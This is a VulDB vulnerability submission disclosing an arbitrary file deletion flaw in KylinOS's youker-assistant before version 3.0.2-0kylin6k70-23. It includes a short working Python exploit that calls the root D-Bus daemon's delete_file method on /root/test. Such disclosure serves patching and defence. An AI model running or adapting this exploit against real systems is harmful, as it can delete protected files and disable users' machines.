제출 #159379: Kylin OS youker-assistant arbitrary file delete vuln정보

제목Kylin OS youker-assistant arbitrary file delete vuln
설명Report Describe youker-assistant is an integrated tool on KylinOS Desktop to help perform daily system maintenance tasks. The delete_file in this program has an arbitrary file deletion vulnerability, which can cause the system to be unavailable. Hazard level High Affected version youker-assistant < 3.0.2-0kylin6k70-23 POC&&EXP ISO Download: https://distro-images.kylinos.cn:8802/web_pungi/download/share/HXDYtGjZm3daA4UvOTLkiPl1nB9ErM0c/ exploit.py import dbus filepath = "/root/test" bus = dbus.SystemBus() obj = bus.get_object('com.kylin.assistant.systemdaemon','/com/kylin/assistant/systemdaemon') obj.delete_file(filepath,dbus_interface = 'com.kylin.assistant.systemdaemon')
원천⚠️ https://github.com/i900008/vulndb/blob/main/kylinos_vul4.md
사용자
 Set3r.Pan (UID 28571)
제출2023. 05. 22. AM 09:38 (3 연령 ago)
모더레이션2023. 06. 05. AM 07:08 (14 days later)
상태수락
VulDB 항목230689 [KylinSoft youker-assistant 전에 3.0.2-0kylin6k70-23 켜짐 KylinOS Arbitrary File dbus.SystemBus delete_file 권한 상승]
포인트들20

이전개요다음

Might our Artificial Intelligence support you?

Check our Alexa App!